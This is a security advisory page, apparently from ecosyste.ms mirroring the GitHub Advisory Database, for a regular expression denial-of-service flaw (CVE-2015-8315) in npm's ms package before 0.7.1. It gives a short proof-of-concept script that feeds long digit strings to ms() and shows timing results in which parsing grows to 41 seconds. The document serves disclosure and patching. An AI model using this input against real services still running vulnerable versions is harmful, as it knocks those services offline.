Ecosyste.ms: Advisories

An open API service providing security vulnerability metadata for many open source software ecosystems.

Security Advisories: MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNmeDUtZnd2ci14cmpn

Regular Expression Denial of Service in ms

Versions of ms prior to 0.7.1 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed.

Proof of Concept

var ms = require('ms');
var genstr = function (len, chr) {
   var result = "";
   for (i=0; i<=len; i++) {
       result = result + chr;
   }

   return result;
}

ms(genstr(process.argv[2], "5") + " minutea");

Results

Showing increase in execution time based on the input string.

$ time node ms.js 10000

real	0m0.758s
user	0m0.724s
sys	0m0.031s

$ time node ms.js 20000

real	0m2.580s
user	0m2.494s
sys	0m0.047s

$ time node ms.js 30000

real	0m5.747s
user	0m5.483s
sys	0m0.080s

$ time node ms.js 80000

real	0m41.022s
user	0m38.894s
sys	0m0.529s
Permalink: https://github.com/advisories/GHSA-3fx5-fwvr-xrjg
JSON: https://advisories.ecosyste.ms/api/v1/advisories/MDE2OlNlY3VyaXR5QWR2aXNvcnlHSFNBLTNmeDUtZnd2ci14cmpn
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: over 6 years ago
Updated: 6 months ago


CVSS Score: 7.5
CVSS vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Identifiers: GHSA-3fx5-fwvr-xrjg, CVE-2015-8315
References: Blast Radius: 47.7

Affected Packages

npm:ms
Dependent packages: 5,545
Dependent repositories: 2,318,159
Downloads: 997,002,555 last month
Affected Version Ranges: < 0.7.1
Fixed in: 0.7.1
All affected versions: 0.1.0, 0.2.0, 0.3.0, 0.4.0, 0.5.0, 0.5.1, 0.6.0, 0.6.1, 0.6.2, 0.7.0
All unaffected versions: 0.7.1, 0.7.2, 0.7.3, 1.0.0, 2.0.0, 2.1.0, 2.1.1, 2.1.2, 2.1.3